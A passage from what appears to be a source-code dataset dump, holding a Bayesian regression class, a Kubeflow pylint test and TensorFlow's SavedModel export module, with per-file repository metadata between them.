                self.w_cov,
                size=sample_size,
            )
            return x @ drawn_weights.T
        y = x @ self.w_mean
        if not return_std:
            return y
        # Predictive variance = noise variance + projected weight covariance.
        y_var = 1 / self.beta + np.sum(x @ self.w_cov * x, axis=1)
        return y, np.sqrt(y_var)
| 31.43 | 75 | 0.570474 | import numpy as np
from prml.linear._regression import Regression
class BayesianRegression(Regression):
def __init__(self, alpha: float = 1.0, beta: float = 1.0):
self.alpha = alpha
self.beta = beta
self.w_mean = None
self.w_precision = None
def _is_prior_defined(self) -> bool:
return self.w_mean is not None and self.w_precision is not None
def _get_prior(self, ndim: int) -> tuple:
if self._is_prior_defined():
return self.w_mean, self.w_precision
else:
return np.zeros(ndim), self.alpha * np.eye(ndim)
def fit(self, x_train: np.ndarray, y_train: np.ndarray):
mean_prev, precision_prev = self._get_prior(np.size(x_train, 1))
w_precision = precision_prev + self.beta * x_train.T @ x_train
w_mean = np.linalg.solve(
w_precision,
precision_prev @ mean_prev + self.beta * x_train.T @ y_train,
)
self.w_mean = w_mean
self.w_precision = w_precision
self.w_cov = np.linalg.inv(self.w_precision)
def predict(
self,
x: np.ndarray,
return_std: bool = False,
sample_size: int = None,
):
if sample_size is not None:
w_sample = np.random.multivariate_normal(
self.w_mean,
self.w_cov,
size=sample_size,
)
y_sample = x @ w_sample.T
return y_sample
y = x @ self.w_mean
if return_std:
y_var = 1 / self.beta + np.sum(x @ self.w_cov * x, axis=1)
y_std = np.sqrt(y_var)
return y, y_std
return y
| true | true |
f73276b8fb36b5de1ebbd4da742bc1622708cb89 | 3,072 | py | Python | py/kubeflow/testing/py_lint_test.py | ChanYiLin/testing | fab6c2782d18c3439b2699df7d1d7da154393e06 | [
"Apache-2.0"
] | null | null | null | py/kubeflow/testing/py_lint_test.py | ChanYiLin/testing | fab6c2782d18c3439b2699df7d1d7da154393e06 | [
"Apache-2.0"
] | 451 | 2021-01-22T12:27:17.000Z | 2022-03-30T02:08:22.000Z | py/kubeflow/testing/py_lint_test.py | ChanYiLin/testing | fab6c2782d18c3439b2699df7d1d7da154393e06 | [
"Apache-2.0"
] | null | null | null | import fnmatch
import logging
import os
import subprocess
from kubeflow.testing import util
import pytest
logging.basicConfig(
level=logging.INFO,
format=('%(levelname)s|%(asctime)s'
'|%(pathname)s|%(lineno)d| %(message)s'),
datefmt='%Y-%m-%dT%H:%M:%S',
)
logging.getLogger().setLevel(logging.INFO)
def should_exclude(root, full_dir_excludes):
  """Return True if ``root`` falls under any of the excluded directory paths."""
  return any(root.startswith(prefix) for prefix in full_dir_excludes)
def test_lint(record_xml_attribute, src_dir, rcfile):  # pylint: disable=redefined-outer-name
  """Run pylint over every ``*.py`` file under ``src_dir`` and fail if any
  file reports lint errors.
  """
  # Override the classname attribute in the junit file.
  # This makes it easy to group related tests in test grid.
  # http://doc.pytest.org/en/latest/usage.html#record-xml-attribute
  util.set_pytest_junit(record_xml_attribute, "test_py_lint")

  logging.info('Running test_lint')
  pylint_bin = "pylint"

  # Print out the pylint version because different versions can produce
  # different results.
  util.run([pylint_bin, "--version"])

  # kubeflow_testing is imported as a submodule so we should exclude it
  # TODO(jlewi): We should make this an argument.
  dir_excludes = [
      "dashboard/frontend/node_modules",
      "kubeflow_testing",
      "dev-kubeflow-org/ks-app/vendor",
      # TODO(https://github.com/kubeflow/testing/issues/560) stop skipping
      # py/kubeflow/testing/cd once we update python & pylint so f style
      # strings don't generate lint errors.
      "kubeflow/testing",
      "release-infra",
  ]
  # Resolve the source root once.  The old code sliced ``full_path`` with
  # ``len(src_dir)`` even though the walk used ``os.path.abspath(src_dir)``,
  # which mis-trimmed the reported paths whenever ``src_dir`` was relative.
  abs_src = os.path.abspath(src_dir)
  full_dir_excludes = [os.path.join(abs_src, f) for f in dir_excludes]
  logging.info("Directories to be excluded: %s", ",".join(full_dir_excludes))
  # TODO(jlewi): Use pathlib once we switch to python3.
  includes = ["*.py"]
  failed_files = []
  if not rcfile:
    rcfile = os.path.join(src_dir, ".pylintrc")

  for root, dirs, files in os.walk(abs_src, topdown=True):
    # Exclude vendor directories and all sub files.
    if "vendor" in root.split(os.sep):
      continue

    if should_exclude(root, full_dir_excludes):
      logging.info("Skipping directory %s", root)
      continue

    # Prune excluded subdirectories in place so ``os.walk`` never descends
    # into them.  (The previous ``dirs[:] = [d for d in dirs]`` was a no-op;
    # this yields the same lint results, just without the wasted traversal.)
    dirs[:] = [
        d for d in dirs
        if not should_exclude(os.path.join(root, d), full_dir_excludes)
    ]
    for pat in includes:
      for f in fnmatch.filter(files, pat):
        full_path = os.path.join(root, f)
        try:
          util.run(
              [pylint_bin, "--rcfile=" + rcfile, full_path], cwd=src_dir)
        except subprocess.CalledProcessError:
          failed_files.append(full_path[len(abs_src):])

  if failed_files:
    failed_files.sort()
    logging.error("%s files had lint errors:\n%s", len(failed_files),
                  "\n".join(failed_files))
  else:
    logging.info("No lint issues.")
  assert not failed_files
if __name__ == "__main__":
  # Allow running this file directly: re-apply the logging setup and hand
  # control to pytest, which discovers and runs test_lint above.
  logging.basicConfig(
      level=logging.INFO,
      format=('%(levelname)s|%(asctime)s'
              '|%(pathname)s|%(lineno)d| %(message)s'),
      datefmt='%Y-%m-%dT%H:%M:%S',
  )
  logging.getLogger().setLevel(logging.INFO)
  pytest.main()
| 30.72 | 92 | 0.675456 | import fnmatch
import logging
import os
import subprocess
from kubeflow.testing import util
import pytest
logging.basicConfig(
level=logging.INFO,
format=('%(levelname)s|%(asctime)s'
'|%(pathname)s|%(lineno)d| %(message)s'),
datefmt='%Y-%m-%dT%H:%M:%S',
)
logging.getLogger().setLevel(logging.INFO)
def should_exclude(root, full_dir_excludes):
for e in full_dir_excludes:
if root.startswith(e):
return True
return False
def test_lint(record_xml_attribute, src_dir, rcfile):
  """Run pylint over every Python file under `src_dir` and fail on any error.

  Args:
    record_xml_attribute: pytest fixture used to override junit XML attributes.
    src_dir: Root directory to scan for *.py files.
    rcfile: Path to a pylintrc; defaults to <src_dir>/.pylintrc when falsy.
  """
  # Fix: the original line was the corrupted call `nit(record_xml_attribute,
  # "test_py_lint")`, which raises NameError. Restore the kubeflow.testing
  # convention of overriding the junit test name.
  util.set_pytest_junit(record_xml_attribute, "test_py_lint")
  logging.info('Running test_lint')
  pylint_bin = "pylint"
  # Log the pylint version so lint failures are reproducible.
  util.run([pylint_bin, "--version"])

  # Directories (relative to src_dir) that should not be linted.
  dir_excludes = [
      "dashboard/frontend/node_modules",
      "kubeflow_testing",
      "dev-kubeflow-org/ks-app/vendor",
      # TODO(https://github.com/kubeflow/testing/issues/560) stop skipping
      # kubeflow/testing once python & pylint are updated so f-style strings
      # don't generate lint errors.
      "kubeflow/testing",
      "release-infra",
  ]
  full_dir_excludes = [
      os.path.join(os.path.abspath(src_dir), f) for f in dir_excludes
  ]
  logging.info("Directories to be excluded: %s", ",".join(full_dir_excludes))
  # TODO(jlewi): Use pathlib once we switch to python3.
  includes = ["*.py"]
  failed_files = []
  if not rcfile:
    rcfile = os.path.join(src_dir, ".pylintrc")
  for root, _, files in os.walk(os.path.abspath(src_dir), topdown=True):
    # Exclude vendor directories and all sub files.
    if "vendor" in root.split(os.sep):
      continue
    # excludes can be done with fnmatch.filter and complementary set,
    # but it's more annoying to read.
    if should_exclude(root, full_dir_excludes):
      logging.info("Skipping directory %s", root)
      continue
    for pat in includes:
      for f in fnmatch.filter(files, pat):
        full_path = os.path.join(root, f)
        try:
          util.run(
              [pylint_bin, "--rcfile=" + rcfile, full_path], cwd=src_dir)
        except subprocess.CalledProcessError:
          # Record the path relative to src_dir for readable reporting.
          failed_files.append(full_path[len(src_dir):])
  if failed_files:
    failed_files.sort()
    logging.error("%s files had lint errors:\n%s", len(failed_files),
                  "\n".join(failed_files))
  else:
    logging.info("No lint issues.")
  assert not failed_files
if __name__ == "__main__":
  # Script entry point: reconfigure logging, then delegate to pytest so the
  # lint test above is collected and executed.
  logging.basicConfig(
      level=logging.INFO,
      format=('%(levelname)s|%(asctime)s'
              '|%(pathname)s|%(lineno)d| %(message)s'),
      datefmt='%Y-%m-%dT%H:%M:%S',
  )
  logging.getLogger().setLevel(logging.INFO)
  pytest.main()
f73276ff40784e608204573966e21fed99f4909c | 38,349 | py | Python | tensorflow/python/saved_model/save.py | jnorwood/tensorflow | 67ab6c9cebc4cbb2103246a1523d04261bef22d2 | [
"Apache-2.0"
] | 2 | 2019-06-01T08:12:42.000Z | 2019-06-01T08:13:22.000Z | tensorflow/python/saved_model/save.py | jnorwood/tensorflow | 67ab6c9cebc4cbb2103246a1523d04261bef22d2 | [
"Apache-2.0"
] | null | null | null | tensorflow/python/saved_model/save.py | jnorwood/tensorflow | 67ab6c9cebc4cbb2103246a1523d04261bef22d2 | [
"Apache-2.0"
] | 1 | 2019-05-25T17:45:38.000Z | 2019-05-25T17:45:38.000Z | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Exports a SavedModel from a Trackable Python object."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
from tensorflow.core.framework import versions_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.core.protobuf import saved_model_pb2
from tensorflow.core.protobuf import saved_object_graph_pb2
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import function as defun
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import meta_graph
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import versions
from tensorflow.python.lib.io import file_io
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.saved_model import builder_impl
from tensorflow.python.saved_model import constants
from tensorflow.python.saved_model import function_serialization
from tensorflow.python.saved_model import nested_structure_coder
from tensorflow.python.saved_model import revived_types
from tensorflow.python.saved_model import signature_constants
from tensorflow.python.saved_model import signature_def_utils
from tensorflow.python.saved_model import signature_serialization
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.saved_model import utils_impl
from tensorflow.python.training.saving import functional_saver
from tensorflow.python.training.tracking import base
from tensorflow.python.training.tracking import graph_view
from tensorflow.python.training.tracking import object_identity
from tensorflow.python.training.tracking import tracking
from tensorflow.python.training.tracking import util
from tensorflow.python.util import compat
from tensorflow.python.util.tf_export import tf_export
# Dtypes which cannot be copied into the exported graph as constants; tensors
# of these types must be remapped through a resource_map instead.
_UNCOPIABLE_DTYPES = frozenset((dtypes.resource, dtypes.variant))

# A container for an EagerTensor constant which has been copied to the exported
# Graph. Pairs the original eager tensor with its graph-side copy.
_CapturedConstant = collections.namedtuple(
    "_CapturedConstant", ["eager_tensor", "graph_tensor"])
class _AugmentedGraphView(graph_view.ObjectGraphView):
  """An extendable graph which also tracks functions attached to objects.

  Extensions through `add_object` appear in the object graph and any checkpoints
  generated from it, even if they are not dependencies of the node they were
  attached to in the saving program. For example a `.signatures` attribute is
  added to exported SavedModel root objects without modifying the root object
  itself.

  Also tracks functions attached to objects in the graph, through the caching
  `list_functions` method. Enumerating functions only through this method
  ensures that we get a consistent view of functions, even if object attributes
  create new functions every time they are accessed.
  """

  def __init__(self, root):
    # A saveables cache is only usable when building a graph outside a
    # function; under eager execution or inside a function it is disabled.
    if (not context.executing_eagerly()
        and not ops.inside_function()):
      saveables_cache = object_identity.ObjectIdentityWeakKeyDictionary()
    else:
      saveables_cache = None
    super(_AugmentedGraphView, self).__init__(root, saveables_cache)
    # Object -> (name -> dep)
    self._extra_dependencies = object_identity.ObjectIdentityDictionary()
    # Cache filled lazily by `list_functions`: object -> (name -> function),
    # so each object's functions are enumerated exactly once.
    self._functions = object_identity.ObjectIdentityDictionary()

  def add_object(self, parent_node, name_in_parent, subgraph_root):
    """Attach an object to `parent_node`, overriding any existing dependency."""
    self._extra_dependencies.setdefault(
        parent_node, {})[name_in_parent] = subgraph_root

  def list_dependencies(self, obj):
    """Overrides a parent method to include `add_object` objects."""
    extra_dependencies = self._extra_dependencies.get(obj, {})
    used_names = set()
    for name, dep in super(_AugmentedGraphView, self).list_dependencies(obj):
      used_names.add(name)
      if name in extra_dependencies:
        # An `add_object` extra takes precedence over the original dependency
        # of the same name.
        yield base.TrackableReference(name, extra_dependencies[name])
      else:
        yield base.TrackableReference(name, dep)
    for name, dep in extra_dependencies.items():
      if name in used_names:
        continue
      yield base.TrackableReference(name, dep)

  def list_functions(self, obj):
    """Returns the cached name -> function mapping attached to `obj`."""
    obj_functions = self._functions.get(obj, None)
    if obj_functions is None:
      obj_functions = obj._list_functions_for_serialization()  # pylint: disable=protected-access
      self._functions[obj] = obj_functions
    return obj_functions
class _SaveableView(object):
  """Provides a frozen view over a trackable root.

  This class helps creating a single stable view over an object to save. The
  saving code should access properties and functions via this class and not via
  the original object as there are cases where an object construct their
  trackable attributes and functions dynamically per call and will yield
  different objects if invoked more than once.

  Changes to the graph, for example adding objects, must happen in
  `checkpoint_view` (an `_AugmentedGraphView`) before the `_SaveableView` is
  constructed. Changes after the `_SaveableView` has been constructed will be
  ignored.
  """

  def __init__(self, checkpoint_view):
    self.checkpoint_view = checkpoint_view
    trackable_objects, node_ids, slot_variables = (
        self.checkpoint_view.objects_ids_and_slot_variables())
    self.nodes = trackable_objects
    self.node_ids = node_ids
    # Maps captured eager tensors (resource handles, asset paths, copied
    # constants) to the id of their owning node; populated by `map_resources`.
    self.captured_tensor_node_ids = object_identity.ObjectIdentityDictionary()
    self.slot_variables = slot_variables
    self.concrete_functions = []

    # Also add `Function`s as nodes.
    nodes_without_functions = list(self.nodes)
    seen_function_names = set()
    for node in nodes_without_functions:
      for function in checkpoint_view.list_functions(node).values():
        if function not in self.node_ids:
          self.node_ids[function] = len(self.nodes)
          self.nodes.append(function)
        if isinstance(function, def_function.Function):
          # Force listing the concrete functions for the side effects:
          # - populate the cache for functions that have an input_signature
          #   and have not been called.
          # - force side effects of creation of concrete functions, e.g. create
          #   variables on first run.
          concrete_functions = (
              function._list_all_concrete_functions_for_serialization())  # pylint: disable=protected-access
        else:
          concrete_functions = [function]
        for concrete_function in concrete_functions:
          # De-duplicate by function name: the same concrete function may be
          # reachable from several nodes.
          if concrete_function.name not in seen_function_names:
            seen_function_names.add(concrete_function.name)
            self.concrete_functions.append(concrete_function)

  @property
  def root(self):
    # Node 0 is always the root object being exported.
    return self.nodes[0]

  def fill_object_graph_proto(self, proto):
    """Populate the nodes, children and slot_variables of a SavedObjectGraph."""
    for node_id, node in enumerate(self.nodes):
      assert self.node_ids[node] == node_id
      object_proto = proto.nodes.add()
      object_proto.slot_variables.extend(self.slot_variables.get(node, ()))
      # Function and captured-constant nodes have no children; their payloads
      # are serialized separately in `_write_object_proto`.
      if isinstance(node, (def_function.Function, defun.ConcreteFunction,
                           _CapturedConstant)):
        continue
      for child in self.checkpoint_view.list_dependencies(node):
        child_proto = object_proto.children.add()
        child_proto.node_id = self.node_ids[child.ref]
        child_proto.local_name = child.name
      for local_name, ref_function in (
          self.checkpoint_view.list_functions(node).items()):
        child_proto = object_proto.children.add()
        child_proto.node_id = self.node_ids[ref_function]
        child_proto.local_name = local_name

  def map_resources(self):
    """Makes new resource handle ops corresponding to existing resource tensors.

    Creates resource handle ops in the current default graph, whereas
    `accessible_objects` will be from an eager context. Resource mapping adds
    resource handle ops to the main GraphDef of a SavedModel, which allows the
    C++ loader API to interact with variables.

    Returns:
      A tuple of (object_map, resource_map, asset_info):
        object_map: A dictionary mapping from object in `accessible_objects` to
          replacement objects created to hold the new resource tensors.
        resource_map: A dictionary mapping from resource tensors extracted from
          `accessible_objects` to newly created resource tensors.
        asset_info: An _AssetInfo tuple describing external assets referenced
          from accessible_objects.
    """
    # Only makes sense when adding to the export Graph
    assert not context.executing_eagerly()
    # TODO(allenl): Handle MirroredVariables and other types of variables which
    # may need special casing.
    object_map = object_identity.ObjectIdentityDictionary()
    resource_map = {}
    asset_info = _AssetInfo(
        asset_defs=[],
        asset_initializers_by_resource={},
        asset_filename_map={},
        asset_index={})
    for node_id, obj in enumerate(self.nodes):
      if isinstance(obj, tracking.CapturableResource):
        # pylint: disable=protected-access
        with ops.device(obj._resource_device):
          new_resource = obj._create_resource()
        # pylint: enable=protected-access
        resource_map[obj.resource_handle] = new_resource
        self.captured_tensor_node_ids[obj.resource_handle] = node_id
      elif resource_variable_ops.is_resource_variable(obj):
        new_variable = resource_variable_ops.copy_to_graph_uninitialized(obj)
        object_map[obj] = new_variable
        resource_map[obj.handle] = new_variable.handle
        self.captured_tensor_node_ids[obj.handle] = node_id
      elif isinstance(obj, tracking.TrackableAsset):
        _process_asset(obj, asset_info, resource_map)
        self.captured_tensor_node_ids[obj.asset_path] = node_id

    for concrete_function in self.concrete_functions:
      for capture in concrete_function.captured_inputs:
        # Eager constants captured by functions (non-resource, non-variant,
        # not already mapped) are copied into the graph and registered as
        # `_CapturedConstant` nodes.
        if (tensor_util.is_tensor(capture)
            and capture.dtype not in _UNCOPIABLE_DTYPES
            and capture not in self.captured_tensor_node_ids):
          copied_tensor = constant_op.constant(
              tensor_util.constant_value(capture))
          node_id = len(self.nodes)
          node = _CapturedConstant(
              eager_tensor=capture, graph_tensor=copied_tensor)
          self.nodes.append(node)
          self.node_ids[capture] = node_id
          self.node_ids[node] = node_id
          self.captured_tensor_node_ids[capture] = node_id
          resource_map[capture] = copied_tensor

    return object_map, resource_map, asset_info
def _tensor_dict_to_tensorinfo(tensor_dict):
  """Converts a name -> Tensor mapping into a name -> TensorInfo mapping."""
  infos = {}
  for name, tensor in tensor_dict.items():
    infos[name] = utils_impl.build_tensor_info_internal(tensor)
  return infos
def _map_captures_to_created_tensors(
original_captures, resource_map):
"""Maps eager tensors captured by a function to Graph resources for export.
Args:
original_captures: A dictionary mapping from tensors captured by the
function to interior placeholders for those tensors (inside the function
body).
resource_map: A dictionary mapping from resource tensors owned by the eager
context to resource tensors in the exported graph.
Returns:
A list of stand-in tensors which belong to the exported graph, corresponding
to the function's captures.
Raises:
AssertionError: If the function references a resource which is not part of
`resource_map`.
"""
export_captures = []
for exterior, interior in original_captures.items():
mapped_resource = resource_map.get(exterior, None)
if mapped_resource is None:
raise AssertionError(
("Tried to export a function which references untracked object {}."
"TensorFlow objects (e.g. tf.Variable) captured by functions must "
"be tracked by assigning them to an attribute of a tracked object "
"or assigned to an attribute of the main object directly.")
.format(interior))
export_captures.append(mapped_resource)
return export_captures
def _map_function_arguments_to_created_inputs(
    function_arguments, signature_key, function_name):
  """Creates exterior placeholders in the exported graph for function arguments.

  Functions have two types of inputs: tensors captured from the outside (eager)
  context, and arguments to the function which we expect to receive from the
  user at each call. `_map_captures_to_created_tensors` replaces
  captured tensors with stand-ins (typically these are resource dtype tensors
  associated with variables). `_map_function_inputs_to_created_inputs` runs over
  every argument, creating a new placeholder for each which will belong to the
  exported graph rather than the function body.

  Args:
    function_arguments: A list of argument placeholders in the function body.
    signature_key: The name of the signature being exported, for error messages.
    function_name: The name of the function, for error messages.

  Returns:
    A tuple of (mapped_inputs, exterior_placeholders)
      mapped_inputs: A list with entries corresponding to `function_arguments`
        containing all of the inputs of the function gathered from the exported
        graph (both captured resources and arguments).
      exterior_argument_placeholders: A dictionary mapping from argument names
        to placeholders in the exported graph, containing the explicit arguments
        to the function which a user is expected to provide.

  Raises:
    ValueError: If argument names are not unique.
  """
  # `exterior_argument_placeholders` holds placeholders which are outside the
  # function body, directly contained in a MetaGraph of the SavedModel. The
  # function body itself contains nearly identical placeholders used when
  # running the function, but these exterior placeholders allow Session-based
  # APIs to call the function using feeds and fetches which name Tensors in the
  # MetaGraph.
  exterior_argument_placeholders = {}
  mapped_inputs = []
  for placeholder in function_arguments:
    # `export_captures` contains an exhaustive set of captures, so if we don't
    # find the input there then we now know we have an argument.
    user_input_name = compat.as_str_any(
        placeholder.op.get_attr("_user_specified_name"))
    # If the internal placeholders for a function have names which were
    # uniquified by TensorFlow, then a single user-specified argument name
    # must refer to multiple Tensors. The resulting signatures would be
    # confusing to call. Instead, we throw an exception telling the user to
    # specify explicit names.
    if user_input_name != placeholder.op.name:
      # This should be unreachable, since concrete functions may not be
      # generated with non-unique argument names.
      raise ValueError(
          ("Got non-flat/non-unique argument names for SavedModel "
           "signature '{}': more than one argument to '{}' was named '{}'. "
           "Signatures have one Tensor per named input, so to have "
           "predictable names Python functions used to generate these "
           "signatures should avoid *args and Tensors in nested "
           "structures unless unique names are specified for each. Use "
           "tf.TensorSpec(..., name=...) to provide a name for a Tensor "
           "input.")
          .format(signature_key, compat.as_str_any(function_name),
                  user_input_name))
    # Name the exterior placeholder "<signature>_<argument>" so Session-based
    # consumers get predictable feed names.
    arg_placeholder = array_ops.placeholder(
        shape=placeholder.shape,
        dtype=placeholder.dtype,
        name="{}_{}".format(signature_key, user_input_name))
    exterior_argument_placeholders[user_input_name] = arg_placeholder
    mapped_inputs.append(arg_placeholder)
  return mapped_inputs, exterior_argument_placeholders
def _call_function_with_mapped_captures(function, args, resource_map):
  """Calls `function` in the exported graph, using mapped resource captures."""
  # Swap the function's eager captures for their graph-side stand-ins.
  graph_captures = _map_captures_to_created_tensors(
      function.graph.captures, resource_map)
  all_inputs = list(args) + graph_captures
  # Calls the function quite directly, since we have new captured resource
  # tensors we need to feed in which weren't part of the original function
  # definition.
  # pylint: disable=protected-access
  flat_outputs = function._inference_function.call(
      context.context(), all_inputs)
  return function._build_call_outputs(flat_outputs)
  # pylint: enable=protected-access
def _generate_signatures(signature_functions, resource_map):
  """Validates and calls `signature_functions` in the default graph.

  Args:
    signature_functions: A dictionary mapping string keys to concrete TensorFlow
      functions (e.g. from `signature_serialization.canonicalize_signatures`)
      which will be used to generate SignatureDefs.
    resource_map: A dictionary mapping from resource tensors in the eager
      context to resource tensors in the Graph being exported. This dictionary
      is used to re-bind resources captured by functions to tensors which will
      exist in the SavedModel.

  Returns:
    Each function in the `signature_functions` dictionary is called with
    placeholder Tensors, generating a function call operation and output
    Tensors. The placeholder Tensors, the function call operation, and the
    output Tensors from the function call are part of the default Graph.

    This function then returns a dictionary with the same structure as
    `signature_functions`, with the concrete functions replaced by SignatureDefs
    implicitly containing information about how to call each function from a
    TensorFlow 1.x Session / the C++ Loader API. These SignatureDefs reference
    the generated placeholders and Tensor outputs by name.

    The caller is expected to include the default Graph set while calling this
    function as a MetaGraph in a SavedModel, including the returned
    SignatureDefs as part of that MetaGraph.
  """
  signatures = {}
  # Sort for deterministic ordering of the generated graph ops.
  for signature_key, function in sorted(signature_functions.items()):
    if function.graph.captures:
      # Captured tensors come after the user-visible arguments in
      # `graph.inputs`; strip them to keep only the explicit arguments.
      argument_inputs = function.graph.inputs[:-len(function.graph.captures)]
    else:
      argument_inputs = function.graph.inputs
    mapped_inputs, exterior_argument_placeholders = (
        _map_function_arguments_to_created_inputs(
            argument_inputs, signature_key, function.name))
    outputs = _call_function_with_mapped_captures(
        function, mapped_inputs, resource_map)
    signatures[signature_key] = signature_def_utils.build_signature_def(
        _tensor_dict_to_tensorinfo(exterior_argument_placeholders),
        _tensor_dict_to_tensorinfo(outputs),
        method_name=signature_constants.PREDICT_METHOD_NAME)
  return signatures
def _trace_resource_initializers(accessible_objects):
  """Create concrete functions from `CapturableResource` objects."""

  def _make_initializer_fn(resource):
    # Bind `resource` eagerly to avoid the late-binding closure pitfall.
    def _run_initializer():
      resource._initialize()  # pylint: disable=protected-access
      # Dummy control output so the traced function has a return value.
      return constant_op.constant(1.)
    return _run_initializer

  traced = []
  for candidate in accessible_objects:
    if isinstance(candidate, tracking.CapturableResource):
      # input_signature=[]: the resource itself becomes a capture, so the
      # initializer takes no explicit arguments.
      traced.append(
          def_function.function(
              _make_initializer_fn(candidate),
              input_signature=[]).get_concrete_function())
  return traced
# Bookkeeping accumulated while exporting asset files (external files
# referenced by the object graph) into a SavedModel; see `_process_asset`.
_AssetInfo = collections.namedtuple(
    "_AssetInfo", [
        # List of AssetFileDef protocol buffers
        "asset_defs",
        # Map from asset variable resource Tensors to their init ops
        "asset_initializers_by_resource",
        # Map from base asset filenames to full paths
        "asset_filename_map",
        # Map from TrackableAsset to index of corresponding AssetFileDef
        "asset_index"])
def _process_asset(trackable_asset, asset_info, resource_map):
  """Add `trackable_asset` to `asset_info` and `resource_map`.

  Args:
    trackable_asset: A `TrackableAsset` whose file should be exported with the
      SavedModel.
    asset_info: An `_AssetInfo` accumulator; mutated in place.
    resource_map: Map from eager tensors to exported-graph tensors; mutated in
      place so the asset's path tensor resolves to the new asset variable.
  """
  original_path_tensor = trackable_asset.asset_path
  original_path = tensor_util.constant_value(original_path_tensor)
  try:
    original_path = str(original_path.astype(str))
  except AttributeError:
    # Already a string rather than a numpy array
    pass
  # Pick a unique basename for the asset inside the SavedModel's assets dir.
  path = builder_impl.get_asset_filename_to_add(
      asset_filepath=original_path,
      asset_filename_map=asset_info.asset_filename_map)
  # TODO(andresp): Instead of mapping 1-1 between trackable asset
  # and asset in the graph def consider deduping the assets that
  # point to the same file.
  asset_path_initializer = array_ops.placeholder(
      shape=original_path_tensor.shape,
      dtype=dtypes.string,
      name="asset_path_initializer")
  # The variable is fed the real asset path at load time via the placeholder.
  asset_variable = resource_variable_ops.ResourceVariable(
      asset_path_initializer)
  asset_info.asset_filename_map[path] = original_path
  asset_def = meta_graph_pb2.AssetFileDef()
  asset_def.filename = path
  asset_def.tensor_info.name = asset_path_initializer.name
  asset_info.asset_defs.append(asset_def)
  asset_info.asset_initializers_by_resource[original_path_tensor] = (
      asset_variable.initializer)
  asset_info.asset_index[trackable_asset] = len(asset_info.asset_defs) - 1
  resource_map[original_path_tensor] = asset_variable
def _fill_meta_graph_def(meta_graph_def, saveable_view, signature_functions):
  """Generates a MetaGraph which calls `signature_functions`.

  Args:
    meta_graph_def: The MetaGraphDef proto to fill.
    saveable_view: The _SaveableView being exported.
    signature_functions: A dictionary mapping signature keys to concrete
      functions containing signatures to add to the MetaGraph.

  Returns:
    A tuple of (asset_info, exported_graph): the `_AssetInfo` describing
    referenced external assets, and the `ops.Graph` the MetaGraph was built in.
  """
  # List objects from the eager context to make sure Optimizers give us the
  # right Graph-dependent variables.
  accessible_objects = saveable_view.nodes
  resource_initializer_functions = _trace_resource_initializers(
      accessible_objects)
  exported_graph = ops.Graph()
  resource_initializer_ops = []
  with exported_graph.as_default():
    object_map, resource_map, asset_info = saveable_view.map_resources()
    for resource_initializer_function in resource_initializer_functions:
      asset_dependencies = []
      # Ensure asset variables are initialized before resources that read them.
      for capture in resource_initializer_function.graph.external_captures:
        asset_initializer = asset_info.asset_initializers_by_resource.get(
            capture, None)
        if asset_initializer is not None:
          asset_dependencies.append(asset_initializer)
      with ops.control_dependencies(asset_dependencies):
        resource_initializer_ops.append(
            _call_function_with_mapped_captures(
                resource_initializer_function, [], resource_map))
    resource_initializer_ops.extend(
        asset_info.asset_initializers_by_resource.values())
    with ops.control_dependencies(resource_initializer_ops):
      init_op = control_flow_ops.no_op()
    # Add the same op to the main_op collection and to the init_op
    # signature. The collection is for compatibility with older loader APIs;
    # only one will be executed.
    meta_graph_def.collection_def[constants.MAIN_OP_KEY].node_list.value.append(
        init_op.name)
    meta_graph_def.signature_def[constants.INIT_OP_SIGNATURE_KEY].CopyFrom(
        signature_def_utils.op_signature_def(
            init_op, constants.INIT_OP_SIGNATURE_KEY))

  # Saving an object-based checkpoint again gathers variables. We need to do the
  # gathering from the eager context so Optimizers save the right set of
  # variables, but want any operations associated with the save/restore to be in
  # the exported graph (thus the `to_graph` argument).
  saver = functional_saver.MultiDeviceSaver(
      saveable_view.checkpoint_view.frozen_saveable_objects(
          object_map=object_map, to_graph=exported_graph))

  with exported_graph.as_default():
    signatures = _generate_signatures(signature_functions, resource_map)
    for concrete_function in saveable_view.concrete_functions:
      concrete_function.add_to_graph()
    saver_def = saver.to_proto()
    meta_graph_def.saver_def.CopyFrom(saver_def)
  graph_def = exported_graph.as_graph_def(add_shapes=True)

  meta_graph_def.graph_def.CopyFrom(graph_def)
  meta_graph_def.meta_info_def.tags.append(tag_constants.SERVING)
  meta_graph_def.meta_info_def.tensorflow_version = versions.__version__
  meta_graph_def.meta_info_def.tensorflow_git_version = (
      versions.__git_version__)
  # We currently always strip default attributes.
  meta_graph_def.meta_info_def.stripped_default_attrs = True
  meta_graph_def.meta_info_def.stripped_op_list.MergeFrom(
      meta_graph.stripped_op_list_for_graph(meta_graph_def.graph_def))
  meta_graph_def.asset_file_def.extend(asset_info.asset_defs)
  for signature_key, signature in signatures.items():
    meta_graph_def.signature_def[signature_key].CopyFrom(signature)
  meta_graph.strip_graph_default_valued_attrs(meta_graph_def)
  return asset_info, exported_graph
def _serialize_object_graph(saveable_view, asset_file_def_index):
  """Save a SavedObjectGraph proto for `root`."""
  # SavedObjectGraph is similar to the TrackableObjectGraph proto in the
  # checkpoint. It will eventually go into the SavedModel.
  proto = saved_object_graph_pb2.SavedObjectGraph()
  saveable_view.fill_object_graph_proto(proto)

  coder = nested_structure_coder.StructureCoder()
  for fn in saveable_view.concrete_functions:
    serialized_fn = function_serialization.serialize_concrete_function(
        fn, saveable_view.captured_tensor_node_ids, coder)
    if serialized_fn is not None:
      proto.concrete_functions[fn.name].CopyFrom(serialized_fn)

  for node, node_proto in zip(saveable_view.nodes, proto.nodes):
    _write_object_proto(node, node_proto, asset_file_def_index)
  return proto
